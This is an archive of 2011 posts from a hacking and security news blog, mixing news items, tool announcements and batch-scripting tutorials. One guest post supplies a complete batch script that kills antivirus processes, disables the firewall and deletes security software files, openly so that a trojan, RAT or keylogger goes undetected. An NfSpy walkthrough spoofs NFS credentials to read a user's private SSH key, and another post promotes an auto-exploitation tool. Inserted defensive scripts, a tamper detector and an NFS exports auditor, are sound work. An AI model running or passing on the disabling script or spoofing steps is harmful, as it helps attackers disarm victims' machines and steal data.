
Facebook bug bounty program offers $500 for bug reporting

Posted by Deepanker Verma Sunday, July 31, 2011 0 comments



Facebook has taken a step to find bugs in its social networking website. It has announced a bug bounty program that rewards $500 for finding bugs in Facebook. Facebook announced this on its page, writing: "To show our appreciation for our security researchers, we offer a monetary bounty for certain qualifying security bugs."
To qualify for a bounty, you must:



  • Adhere to our Responsible Disclosure Policy (... give us a reasonable time to respond to your report before making any information public and make a good faith effort to avoid privacy violations, destruction of data and interruption or degradation of our service during your research ...)
  • Be the first person to responsibly disclose the bug
  • Report a bug that could compromise the integrity or privacy of Facebook user data, such as:
      1. Cross-Site Scripting (XSS)
      2. Cross-Site Request Forgery (CSRF/XSRF)
      3. Remote Code Injection
  • Reside in a country not under any current U.S. Sanctions (e.g., North Korea, Libya, Cuba, etc.)

#RefRef - DDoS tool developed by Anonymous

Posted by Deepanker Verma Saturday, July 30, 2011 0 comments



Anonymous is building a new denial-of-service attack tool which is said to exploit SQL vulnerabilities to support the group's future campaigns. It is called #RefRef and is developed in JavaScript. It was very effective in a 17-minute attack from a single machine that resulted in a 42-minute outage on Pastebin yesterday. This was confirmed by Pastebin via Twitter.
This tool will be released in September. The tool uses a simple GUI to operate. As it turns out, the attack is launched client side, and will send a separate script in the connection request made to the target server. This request is actually the exploit itself, and once the server renders the code, it will continue to render it until crashing. In essence, the stronger the server, the faster it crashes.

New Account hijacking vulnerability found in Skype

Posted by Deepanker Verma 0 comments



A critical cross-site scripting (XSS) vulnerability has been found in Skype which leads to account hijacking. The vulnerability is found in the versions which have Facebook integration. This integration allows users to see Facebook activity and post status updates.
Security researcher David Vieira-Kurz discovered that the status comment field does not properly sanitize input and executes JavaScript code. Any attacker can exploit this vulnerability to post a comment that executes rogue code which steals a visitor's Skype session cookie when they view it in the browser.
However, the attacker must be in the victim's friend list; this is the limitation of this attack.

How to disable Antivirus using Batch file | Batch programming part 3

Posted by Deepanker Verma 3 comments

Again a nice guest post on batch programming tutorial by Sanjay


Hi Friends, Hope you all fine... 
Today I am gonna post some of the batch programs, To read the past two batch programming tutorial just click below link.


When you attempt to hack someone's system by RAT, Keylogger or iStealer then you'll first need to FUD your server but its not that much easy to find a good & free working FUD crypter, So first disable your slave antivirus and firewall. So they can't find out your Trojan virus (Server). The below batch program helps you to disable all the running antivirus in the system. Just copy and paste it in a notepad file and save it with .bat extension.


@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.* 
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe 
del /Q /F C:\Program Files\kasper~1\*.exe 
cls
del /Q /F C:\Program Files\trojan~1\*.exe 
del /Q /F C:\Program Files\f-prot95\*.dll 
del /Q /F C:\Program Files\tbav\*.dat 
cls
del /Q /F C:\Program Files\avpersonal\*.vdf 
del /Q /F C:\Program Files\Norton~1\*.cnt 
del /Q /F C:\Program Files\Mcafee\*.* 
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.* 
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.* 
del /Q /F C:\Program Files\Norton~1\Norton~1\*.* 
del /Q /F C:\Program Files\Norton~1\*.* 
cls
del /Q /F C:\Program Files\avgamsr\*.exe 
del /Q /F C:\Program Files\avgamsvr\*.exe 
del /Q /F C:\Program Files\avgemc\*.exe 
cls
del /Q /F C:\Program Files\avgcc\*.exe 
del /Q /F C:\Program Files\avgupsvc\*.exe 
del /Q /F C:\Program Files\grisoft 
del /Q /F C:\Program Files\nood32krn\*.exe 
del /Q /F C:\Program Files\nood32\*.exe 
cls
del /Q /F C:\Program Files\nod32 
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe 
del /Q /F C:\Program Files\kavmm\*.exe 
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe 
del /Q /F C:\Program Files\guard\*.exe 
del /Q /F C:\Program Files\ewido\*.exe 
cls
del /Q /F C:\Program Files\pavprsrv\*.exe 
del /Q /F C:\Program Files\pavprot\*.exe 
del /Q /F C:\Program Files\avengine\*.exe 
cls
del /Q /F C:\Program Files\apvxdwin\*.exe 
del /Q /F C:\Program Files\webproxy\*.exe 
del /Q /F C:\Program Files\panda software\*.* 
rem --


:) Hope you Like It. Just leave your comments below. In my next batch programming tutorial I'll provide more batch programs to you :)  
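Seen from the defending side, a script like the one above is noisy, because every `net stop`, `netsh` and `tskill` line starts a new process under the same parent. The following added example (not part of the original post) correlates process-creation command lines, such as those recorded with command-line auditing enabled, and alerts when one parent tampers with security software in more than one way within a minute; the event tuples, host names and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Process-name prefixes taken from the tskill lines in the listing above.
PROC_PREFIXES = ("av", "kav", "nav", "norton", "mcafe", "msmp", "panda",
                 "syman", "zonealarm", "outpost", "guard")

STOP_RE = re.compile(
    r'\b(?:net1?|sc)(?:\.exe)?"?\s+stop\s+"?'
    r'(?:security center|wscsvc|mpssvc|windefend)', re.I)
FW_RE = re.compile(
    r'\bnetsh(?:\.exe)?"?\s+(?:adv)?firewall\s+set\s+.*'
    r'(?:mode=disable|state\s+off)', re.I)
KILL_RE = re.compile(r'\b(?:tskill|taskkill)(?:\.exe)?"?\s+(.*)$', re.I)

# Constructed sample events: (timestamp, host, parent PID, command line).
# The del /Q /F lines of the script do not show up in this kind of log:
# del is a cmd.exe built-in and creates no process, so catching the
# deletions needs file-deletion telemetry instead.
SAMPLE_EVENTS = [
    ("2011-08-01T10:15:02", "WS-017", 4120, 'net stop "Security Center"'),
    ("2011-08-01T10:15:02", "WS-017", 4120,
     "netsh firewall set opmode mode=disable"),
    ("2011-08-01T10:15:03", "WS-017", 4120, "tskill /A av*"),
    ("2011-08-01T10:15:03", "WS-017", 4120, "tskill /A kav*"),
    ("2011-08-01T10:15:04", "WS-017", 4120, "tskill /A norton*"),
    # Benign administration on another workstation.
    ("2011-08-01T10:20:00", "WS-022", 880, "taskkill /F /IM notepad.exe"),
    ("2011-08-01T10:20:05", "WS-022", 880, "net stop Spooler"),
    # Two isolated actions hours apart: each alone stays below the threshold.
    ("2011-08-01T09:00:00", "SRV-003", 2304, "sc stop wscsvc"),
    ("2011-08-01T11:30:00", "SRV-003", 2304,
     "netsh advfirewall set allprofiles state off"),
]


def classify(cmdline):
    """Return the tamper category of one command line, or None."""
    if STOP_RE.search(cmdline):
        return "service_stop"
    if FW_RE.search(cmdline):
        return "firewall_off"
    m = KILL_RE.search(cmdline)
    if m:
        # Arguments that are not /switches are the process names or patterns.
        targets = [t.lower().strip('"') for t in m.group(1).split()
                   if not t.startswith("/")]
        if any(t.startswith(PROC_PREFIXES) for t in targets):
            return "kill_security_proc"
    return None


def detect(events, window=timedelta(seconds=60), min_kills=5):
    """Alert once per (host, parent PID) when, inside one time window,
    two or more tamper categories or min_kills kill attempts are seen."""
    hits = defaultdict(list)
    for ts, host, ppid, cmdline in events:
        cat = classify(cmdline)
        if cat:
            hits[(host, ppid)].append((datetime.fromisoformat(ts), cat))

    alerts = []
    for (host, ppid), seq in sorted(hits.items()):
        seq.sort()
        start = 0
        for end in range(len(seq)):
            # Slide the window start forward until it spans <= window.
            while seq[end][0] - seq[start][0] > window:
                start += 1
            cats = [c for _, c in seq[start:end + 1]]
            if len(set(cats)) >= 2 or cats.count("kill_security_proc") >= min_kills:
                first = seq[start][0]
                in_win = [c for t, c in seq if first <= t <= first + window]
                alerts.append({
                    "host": host,
                    "parent_pid": ppid,
                    "first_seen": first.isoformat(),
                    "categories": sorted(set(in_win)),
                    "events": len(in_win),
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```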

NfSpy – ID-spoofing NFS Client

Posted by Deepanker Verma Friday, July 29, 2011 0 comments

NfSpy is a library/program that uses the Filesystem in Userspace (FUSE) library to automate the falsification of NFS credentials when mounting an NFS share.


Vulnerability exploited
NFS before version 4 is reliant upon host trust relationships for authentication. The NFS server trusts any client machines to authenticate users and assign the same user IDs (UIDs) that the shared filesystem uses. This works in NIS, NIS+, and LDAP domains, for instance, but only if you know the client machine is not compromised, or faking its identity. This is because the only authentication in the NFS protocol is the passing of the UID and GID (group ID). There are a few things that can be done to enhance the security of NFS, but many of them are incomplete solutions, and even with all three listed here, it could still be possible to circumvent the security measures.
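A defender's view of the trust problem described above, as an added example that is not part of NfSpy or the original post: a small audit of an /etc/exports file that flags entries where the server accepts client-asserted UIDs (AUTH_SYS, the default when no sec= option is set), exports to any host, disables root squashing, or accepts requests from unprivileged ports. The sample file, host names and finding names are constructed for illustration, and the parser assumes one export per line without continuation lines or quoted paths.

```python
import re

# One client token: "host(opt,opt)", "host", or "(opt,opt)" (no host = any host).
TOKEN_RE = re.compile(r'^([^()\s]*)(?:\(([^()]*)\))?$')

FINDINGS = {
    "WORLD": "exported to any host",
    "AUTH_SYS": "server trusts the UID/GID sent by the client (sec=sys)",
    "NO_ROOT_SQUASH": "client-side root is treated as root on the share",
    "INSECURE_PORT": "requests from unprivileged source ports are accepted",
}

# Constructed sample, not taken from any real server.
SAMPLE_EXPORTS = """\
# path           client(options)
/home            *(rw,sync,no_root_squash)
/srv/projects    192.168.1.0/24(rw,sync,sec=sys,insecure)
/srv/finance     fin01.example.internal(rw,sync,sec=krb5p)
/srv/pub         (ro,all_squash)
/srv/mixed       10.0.0.5(rw,sec=krb5p) *(ro)
"""


def parse_exports(text):
    """Yield (path, client, options) for every client entry in the file."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        # A path with no client list is exported to everyone with defaults.
        for token in clients or ["*"]:
            m = TOKEN_RE.match(token)
            if not m:
                continue
            client = m.group(1) or "*"
            opts = [o.strip() for o in (m.group(2) or "").split(",") if o.strip()]
            yield path, client, opts


def audit_entry(client, opts):
    """Return the list of finding codes for one export entry."""
    flavors = ["sys"]  # exportfs default when no sec= option is present
    for opt in opts:
        if opt.startswith("sec="):
            flavors = opt[4:].split(":")

    findings = []
    if client == "*":
        findings.append("WORLD")
    # root_squash (the default) does not help here: any non-root UID can
    # still be asserted. all_squash maps every UID to the anonymous user,
    # so a forged UID gains nothing and the entry is not flagged.
    if "sys" in flavors and "all_squash" not in opts:
        findings.append("AUTH_SYS")
    if "no_root_squash" in opts:
        findings.append("NO_ROOT_SQUASH")
    if "insecure" in opts:
        findings.append("INSECURE_PORT")
    return findings


def audit(text):
    """Map (path, client) to its findings for a whole exports file."""
    return {(p, c): audit_entry(c, o) for p, c, o in parse_exports(text)}


if __name__ == "__main__":
    for (path, client), codes in audit(SAMPLE_EXPORTS).items():
        status = ", ".join(codes) if codes else "ok"
        print(f"{path:15} {client:25} {status}")
        for code in codes:
            print(f"{'':15} - {FINDINGS[code]}")
```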



Using NfSpy


A list of options can be seen by running
nfspy --help

Example


There is an NFS server on 192.168.1.124.

$ showmount -e 192.168.1.124
Export list for 192.168.1.124:
/home (everyone)


Mount up the share. Using sudo lets you bind to a privileged port, and the allow_other option lets any user use the filesystem. The other new option here is "hide", which immediately "unmounts" the share on the server, but keeps the filehandle it got. This hides your presence from anyone using showmount -a


$ sudo nfspy -o server=192.168.1.124:/home,hide,allow_other,ro,intr /mnt


Enjoy your newfound freedom!


$ cd /mnt
/mnt$ ls -l
drwx------ 74 8888 200 4096 2011-03-03 09:55 smithj
/mnt$ cd smithj
/mnt/smithj$ cat .ssh/id.rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,30AEB543E512CA19



To unmount, use fusermount:
$ sudo fusermount -u /mnt

Advanced example

There is an NFS server on 192.168.1.124. Portmap is blocked, so you can't get a list of shares, but you can sniff the network traffic.
$ sudo tshark -n -i eth0 -T fields -e nfs.fhandle
Running as user "root" and group "root". This could be dangerous.
Capturing on eth0
01:00:04:00:01:00:22:00:e5:03:d8:9d:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
01:00:04:01:01:00:22:00:e5:03:d8:9d:07:00:22:00:15:83:74:d5:00:00:00:00:00:00:00:00:00:00:00:00
01:00:04:01:01:00:22:00:e5:03:d8:9d:07:00:22:00:15:83:74:d5:00:00:00:00:00:00:00:00:00:00:00:00


^C3 packets captured

Now use the dirhandle and getroot mount options to avoid using the mount daemon, and use the nfsport option to avoid using the portmapper, traversing up the directory tree to the root of the export.

$ sudo nfspy -o rw,server=192.168.1.124:,nfsport=2049/udp,dirhandle=01:00:04:01:01:00:22:00:e5:03:d8:9d:07:00:22:00:15:83:74:d5:




Read More
https://github.com/bonsaiviking/NfSpy

Download Here
https://github.com/bonsaiviking/NfSpy/archives/master

Download Apache Log Extractor

Posted by Deepanker Verma Thursday, July 28, 2011 0 comments



Apache Log Extractor is a quick script to export URL information from Apache access logs. The thought behind this script was to provide a list of known URLs on a remote server by analysing the logs. This list could then be used as the input for further testing tools (e.g. Burp Suite – Intruder).


The script accepts an Apache access file as the input and creates an output file containing one URL per line. The list is unique and should only contain the URL without parameters (incomplete directory names are not extracted). It also takes these URLs and creates a wordlist output of all valid directory names for use with brute-forcing etc.


Download Here:
https://sites.google.com/a/c22.cc/storage/poc_scripts/apache_log_extractor.py?attredirects=0&d=1

Why Use a Network Security Scanner?

Posted by Deepanker Verma Wednesday, July 27, 2011 0 comments



Every IT administrator strives to use the best security measures available to protect and secure the corporate network. One essential security tool is the network security scanner, which not only helps to identify weaknesses and vulnerabilities in the network but also greatly reduces the workload for administrators.


Many different factors can impact security in modern business networks, and no IT department should be complacent about the possible consequences of failing to consider all of them. 


Good network security means a lot more than simply installing an antivirus product and occasionally deploying Windows updates. Security risks can come from so many other directions. 


Security holes in third party software products, employees’ use of uncontrolled devices, and failure to comply with regulatory requirements, can all land companies in hot water – both legally and financially.  Good network security scanners are designed to take all these risks into consideration and guide companies on how to address the risks arising from the use of technology.


So, what kind of features should network administrators look for in a fully integrated network security scanner solution? 


Compatibility with, and awareness of, all the commonly used software products and operating systems is a very important factor, and the software should be able to work with these systems in both physical and virtualized environments, in recognition of the way many companies now construct their IT systems.


Patch management is a key concern. So many updates and patches are released to protect against newly discovered security vulnerabilities, that without a patch management solution it is nearly impossible to manually keep track of everything which needs to be applied across an infrastructure, both for individual software products as well as the operating systems. A good network security scanner should have the functionality to detect when important updates are missing, and to help IT staff respond quickly to update their systems.


Vulnerabilities do not only exist because security or software updates have not been installed. Incorrect software configurations can create dangerous holes in the network, and these are sometimes caused by employees adjusting settings on their machines without knowledge of the knock-on effects. Choosing a network security scanner with change management and software audit capabilities can alert technical teams when these changes are made, allowing them to be quickly rectified. 


Asset inventory management is also essential. If a staff member has had a networked laptop offsite for a prolonged period and then rejoins it to the network, the IT team needs to be able to receive a notification, and should quickly ensure it is patched with recent updates so that it doesn’t become a potential easy target for malware attacks.


Finally, a network security scanner can help the technical department with an increasingly burdensome duty – compliance. It is best to look for a product that when deployed on a network fulfills most if not all of the requirements of a particular regulatory framework, for example, the PCI DSS standard for organizations that work with credit card details.


A network security scanner is an essential addition to the modern IT department’s arsenal of security measures. The only alternative is to spend vast quantities of time performing manual tasks related to security and compliance, and still not achieve the levels of consistency possible with a dedicated solution managing these issues.


This guest post was provided by Ben Taylor on behalf of GFI Software Ltd. GFI is a leading software developer that provides a single source for network administrators to address their network security, content security and messaging needs. More information: GFI network security scanner 






Batch programming Tutorials Part 2

Posted by Deepanker Verma Monday, July 25, 2011 0 comments

This is a guest post written by Sanjay Jith who is the tech blogger at GeekFloor


Batch files are very powerful programs that can cause unwanted results. There are many malicious combinations that can harm your computer. They can range from erasing Windows to disabling the keyboard via the registry, etc. The most famous malicious batch program is the "Fork Bomb". It opens a program repeatedly so that your memory fills up and eventually your computer crashes.
Create your own batch file:


1. Open Notepad.exe by either going to Run and typing "Notepad" without quotes or click Start > All Programs > Accessories > Notepad.


2. Copy and Paste the following code into Notepad:


@echo off
Echo Hello World!
pause


Note: After you paste this code in Notepad, click File > Save As, save it as anything.bat, and choose "Save as type: All files".
Then click Save. Then click on your batch file.
It's not a malicious program. What it does is open a cmd prompt and display Hello World! in it.
To stop any batch program, go to Task Manager, click Processes, search for your file and click End Process.

In my next tutorial I'll explain malicious batch programs with an example. Use all tricks only for educational purposes. Don't do any illegal activities, or it'll cause unwanted results for you.

VirtualBox 4.1 Final released for Linux

Posted by Deepanker Verma 0 comments



VirtualBox 4.1 final is released for Linux. It is a general-purpose full virtualizer for x86 hardware, targeted at server, desktop and embedded use. VirtualBox is a cross-platform virtualization application. What does that mean? For one thing, it installs on your existing Intel or AMD-based computers, whether they are running Windows, Mac, Linux or Solaris operating systems. Secondly, it extends the capabilities of your existing computer so that it can run multiple operating systems (inside multiple virtual machines) at the same time. So, for example, you can run Windows and Linux on your Mac, run Windows Server 2008 on your Linux server, run Linux on your Windows PC, and so on, all alongside your existing applications. You can install and run as many virtual machines as you like -- the only practical limits are disk space and memory.


VirtualBox is deceptively simple yet also very powerful. It can run everywhere from small embedded systems or desktop class machines all the way up to datacenter deployments and even Cloud environments.


This version is a major update. The following major new features were added:

  • Support for cloning of VMs (bug #5853, see the manual for more information): full clones can be created through the GUI and VBoxManage, linked clones only through VBoxManage
  • GUI: enhanced wizard for creating new virtual disks
  • GUI: new wizard for copying virtual disks
  • GUI: keep the aspect ratio in scale mode (Windows and OSX hosts only; bug #7822)
  • VMM: raised the memory limit for 64-bit hosts to 1TB
  • Experimental support for PCI passthrough for Linux hosts, see the manual for more information
  • Windows guests: Experimental WDDM graphics driver, supporting Windows Aero (bug #4607) and providing Direct3D support using a cleaner approach (no need to install the guest drivers in Safe Mode anymore)
  • Guest Additions: status of modules and features can now be queried separately by the frontends
  • Networking: new network attachment mode "Generic Driver", which offers an open plugin architecture for arbitrary and separately distributable virtual network implementations
  • Host-only Networking: fixed host crash in kernels prior to 2.6.29
  • New Networking Mode UDP Tunnel: allows to interconnect VMs running on different hosts easily and transparently, see the manual for more information
  • Experimental support for SATA hard disk hotplugging available with VBoxManage
  • Solaris hosts: New Crossbow based bridged networking driver for Solaris 11 build 159 and above





Download here:
http://www.virtualbox.org/wiki/Downloads

Hackers can blow up your MacBook

Posted by Deepanker Verma Sunday, July 24, 2011 0 comments



A security researcher has discovered a bug in the MacBook. Security expert Charlie Miller explained that the microcontroller that monitors the power level of Apple laptops can be compromised to run malicious code on it. The researcher has found that the batteries’ microcontroller chips ship with default passwords. Once a hacker learns that password, they can learn to control the chips’ firmware and potentially hijack them. A hacker could even cause the laptop’s battery to explode.
“These batteries just aren’t designed with the idea that people will mess with them,” Miller said. “What I’m showing is that it’s possible to use them to do something really bad.”
“You could put a whole hard drive in, reinstall the software, flash the BIOS, and every time it would reattack and screw you over. There would be no way to eradicate or detect it other than removing the battery.” said Miller.
Miller plans to publicly disclose the flaw, and provide a fix at the Black Hat security conference in August.

Batch programming Tutorials Part 1

Posted by Deepanker Verma 1 comments
This is a guest post written by Sanjay Jith who is the tech blogger at GeekFloor


Today I am gonna explain you about the Batch Programming.

Batch Files:
Batch files came into notice when Microsoft Windows was introduced in 1985 and had a GUI OS/Interface. Before then, batch files were widely used to run earlier operating systems but were never recognized. Batch files back then could be executed by the Command Line Interpreter (CLI) COMMAND.COM. All operating systems before that had a text-based operating system and were designed to run on MS-DOS. Batch files significantly helped Windows operating systems. A batch file named AUTOEXEC.BAT was responsible for the automatic loading of Windows on the early versions of these operating systems. 

Windows batch files were used crucially in these operating systems mainly:
  • Windows 1
  • Windows 2
  • Windows 3
  • Windows 95
  • Windows 98
  • Windows ME 
Batch files are still used as crucial bits in Windows but not as much. Yes, all this does sound confusing.  But all you need to know is that batch files originated in early versions of Windows and performed many crucial tasks on these early operating systems. 

What can batch scripts be used for?
They can be used for various tasks regarding the Windows operating systems. For example, they can be used to delete files, change attributes, remove directories, edit the registry, modify services, and many other things. Batch scripting is very simple to learn and it can be very beneficial to know for anyone who uses Windows.

Creating Batch files: 
Well batch files can be created by using simple text editors (such as notepad). All you need to do is save your file as one of these extensions:
.bat
This is the first ever extension made for batch files. This extension is compatible with all versions of windows.
.cmd 
This extension is mainly used by operating systems in Windows NT family.
.btm 
This is the extension that is used by 4DOS and 4NT. It was previously used for faster compilation sequences. 

Can I make viruses with batch?
The answer is no. Anyone claiming to doesn't fully understand a virus. Viruses are very complex and are coded in things like C++ and Assembly. Viruses are self-replicating malware that is created for the sole purpose of damage and theft of information. Things coded in batch that are claimed to be malware normally are scripts that are added to start-up and perform reboot loops, flooding hard drive so it will run out of space, performing a loop that opens command lines causing the computer to freeze, and things of that sort.

Batch Commands:
Open up Command Prompt and type "help" without quotes, then hit enter. It will show a list of commands and a description of each. To get more information about a command or to get its usage instructions, type the command with "/?" without quotes at the end. For example, "reg /?" without quotes. I have provided a list of the commands and their description. I have also added a few more commands that aren't listed. I created this list a while back.

Assoc - Displays or modifies file extension associations.
Attrib - Displays or changes file attributes.
Bootcfg - Used to configure, query, change or delete the boot entry settings in the boot.ini file.
Break - Sets or clears extended CTRL+C checking.
Bcdedit - Sets properties in boot database to control boot loading.
Cacls - Displays or modifies access control lists (ACLs) of files.
Call - Call one batch program from another
CD - Change Directory - Changes the directory it reads from or displays the name of the current directory.
Chkdsk - Checks a disk and displays a status report.
Chkntfs - Check the NTFS file system
Choice - Allows users to select one item from a list of choices and returns the index of the selected choice.
Cipher - Displays or alters the encryption of directories on NTFS partitions.
CleanMgr - Automated cleanup of Temp files, recycle bins, etc.
Cls - Clears the screen.
Cmd - Starts a new instance of the Windows command interpreter.
Cmdkey - Creates, displays, and deletes stored user names and passwords.
Color - Sets the default console foreground and background colors.
Comp - Compares the contents of two files or sets of files.
Compact - Displays or alters the compression of files on NTFS partitions.
Convert - Converts FAT volumes to NTFS.
Copy - Copies one or more files to another location.
Date - Displays or sets the date.
Defrag - Defragments the hard drive.
Del - Deletes one or more files.
Dir - Displays a list of files and folders.
Diskcomp - Compare the contents of one floppy disk to another.
Diskpart - Displays or configures disk partition properties. 
Doskey - Edits command lines, recalls Windows commands, and creates macros.
Driverquery - Displays current device driver status and properties.
Echo - Displays messages, or turns command echoing on or off.
Endlocal - End localisation of environment changes in a batch file.
Erase - Deletes one or more files.
Eventcreate - Add a message to the Windows event log.
Exit - Exits Command Prompt.
Expand - Expands one or more compressed files.
FC - Compares two files.
Find - Searches for a text string in a file or files.
Findstr - searches for strings in files.
For - Runs a specified command for each file in a set of files.
Forfiles - Selects a file, or set of files, and executes a command on that file.
Format - Formats a disk for use with Windows.
Fsutil - Displays or configures the file system properties.
Ftp - Transfers files to and from a computer running an FTP server service.
Ftype - Displays or modifies file types used in file extension associations.
Goto - Directs the Windows command interpreter to a labeled line in a batch program.
Gpupdate - Updates group policies settings.
Graftabl - Enables Windows to display an extended character set in graphics mode.
Help - Provides help information for Windows commands.
Icacls - Display, modify, backup, or restore ACLs for files and directories.
If - Performs conditional processing in batch programs.
Ipconfig - IP configuration. 
Label - Creates, changes, or deletes the volume label of a disk.
MD - Creates a directory.
MKDir - Creates a directory
Mklink - Creates a symbolic link.
Mode - Configures a system device.
More - Displays output one screen at a time.
Mountvol - Creates, deletes, or lists a volume mount point.
Move - Moves one or more files from one directory to another directory.
Msg - Send a message to a user.
Msiexec - Microsoft Windows Installer.
Mstsc - Remote Desktop
Net - Manage network resources
Netsh - Configure network interfaces.
Nbtstat - Displays protocol statistics and current TCP/IP connections using NBT.
Netstat - Displays protocol statistics and current TCP/IP network connections.
Nslookup - Name server lookup
Openfiles - Displays files opened by remote users for a file share.
Path - Displays or sets a search path for executable files.
Pathping - Trace route plus network latency and packet loss.
Pause - Suspends processing of a batch file and displays a message.
Perfmon - Performance monitor
Ping - Test a network connection
Popd - Restores the previous value of the current directory saved by PUSHD.
Powercfg - Configures power settings.
Print - Prints a text file.
Prompt - Changes the Windows command prompt.
Pushd - Saves the current directory then changes it.
Rasdial - Manage RAS connections
Rasphone - Manage RAS connections
RD - Removes a directory (folder).
Recover - Recovers readable information from a bad or defective disk.
Reg - Registry: Read, set, export, delete, and add keys and values.
Regedit - Import or export registry settings.
Regsvr32 - Register or unregister a DLL.
Regini - Change Registry permissions.
REM - Records comments in batch files.
REN - Renames a file or files.
Rename - Renames a file or files.
Replace - Replaces files.
RMDIR - Removes a directory (folder).
Robocopy - Advanced utility to copy files and directory trees.
Route - Manipulate network routing tables.
RunAs - Executes a program under a different user account.
Rundll32 - Runs a DLL command.
SC - Displays or configures services.
Schtasks - Schedules a command to run at a specific time.
Set - Displays, sets, or removes Windows environment variables.
Setlocal - Begins localization of environment changes in a batch file.
Setx - Set environment variables permanently.
SFC - System File Checker
Shift - Shifts the position of replaceable parameters in batch files.
Shutdown - Allows proper local or remote shutdown of machine.
Slmgr - Software Licensing Management
Sort - Sorts input.
Start - Starts a separate window to run a specified program or command.
Subst - Associates a path with a drive letter.
Systeminfo - Displays machine specific properties and configuration.
TaskList - Displays all currently running tasks including services.
Taskkill - Kill or stop a running process or application.
Time - Displays or sets the system time.
Timeout - Delay processing of a batch file.
Title - Sets the window title for a batch file.
Tracert - Trace route to a remote host.
Tree - Graphically displays the directory structure of a drive or path.
Type - Displays the contents of a text file.
Typeperf - Write performance data to a log file.
Ver - Displays the Windows version.
Verify - Tells Windows whether to verify that your files are written correctly to a disk.
Vol - Display a disk volume label and serial number.
Where - Locate and display files in a directory tree.
Whoami - Output the current Username and domain.
WMIC - WMI commands.
Wuauclt - Windows Update

Color Codes:
These are used to change the color of the GUI. Not required, but they make the Black and White command prompt look better. 
I prefer light yellow text on a light red background.

0 = Black
1 = Blue
2 = Green
3 = Aqua
4 = Red
5 = Purple
6 = Yellow
7 = White
8 = Gray
9 = Light Blue
A = Light Green
B = Light Aqua
C = Light Red
D = Light Purple
E = Light Yellow
F = Bright White

To view the list of colors in your cmd prompt:
1) Open your cmd prompt and just type "help color" (without the quotes).
2) Help with a list of the colors available will show up.
3) The list will show numbers from 0 to 9 and letters from A to F.

Type 'color 6' to have yellow text, 'color 4' to have red text, 'color A' to have light green text etc. ( Ignore all quotes )
To change the color of the text as well as the background, type 'color ce' ( without the quotes ) 
to have light yellow text on a light red background or any other combination. 
The first letter/number is the color of the background and the second is the color of the text.

to be continued in next posts...

If you have any questions.. :)

Hackers boldly claimed, FBI and others can't stop them

Posted by Deepanker Verma Friday, July 22, 2011 0 comments



LulzSec and Anonymous have published a letter addressed to the FBI and others, saying that they can't be stopped.
They wrote, "We want to send a message that chaos on the Internet is unacceptable, [even if] hackers can be believed to have social causes, it's entirely unacceptable to break into websites and commit unlawful acts," Chabinsky told the National Public Radio (NPR).
They published this letter after the FBI's claim that it had caught members of hacker groups. The hackers advised the FBI not to lie to the world.
"These governments and corporations are our enemy. And we will continue to fight them, with all methods we have at our disposal, and that certainly includes breaking into their websites and exposing their lies," the hackers added.
Read the full published letter
http://pastebin.com/RA15ix7S

NetSecL v.3.2 Released

Posted by Deepanker Verma 0 comments


NetSecL is a hardened, live and installable OS based on OpenSuse, suitable for Desktop/Server use and penetration testing. Once installed you can fully enjoy the features of the GrSecurity hardened kernel and penetration tools, or use the penetration tools directly from your live DVD.


NetSecL 3.2 comes with a brand new XFCE which dramatically increased performance. We closed many bugs and also gained more compatibility with OpenSuse 11.4 – most packages are 11.4 compatible. The GrSecurity kernel is updated to 2.6.32.8.


Download Here:
http://www.netsecl.com/download

winAUTOPWN v2.7 - Released

Posted by Deepanker Verma 0 comments



This version covers almost all remote exploits up until mid-July 2011 and a few older ones as well. This version incorporates a few new command-line parameters: -perlrevshURL (for a PERL Reverse Shell URL), -mailFROM (smtpsender) and -mailTO (smtpreceiver). These are the command-line arguments required for a few exploits which require remote connect-back using a perl shell, and for email server exploits requiring authentication, respectively. This version also tackles various internal bugs and fixes them.


Download Here:
http://marijuanaunion.net/quaker/v2/w/Downloads.html

DNS Cache Poisoning Used in Brazilian Phishing Attack

Posted by Deepanker Verma Tuesday, July 19, 2011 0 comments


Zscaler security researchers have found a phishing attack that used DNS cache poisoning to direct victims to a spoofed banking website. The unusual attack was detected targeting customers of Banco Santander Brasil, in Brazil. Attackers managed to force several DNS servers to resolve santander.com.br to an IP address under their control. The spoofed page hosted on the rogue web server was very well crafted and looked identical to the real one.
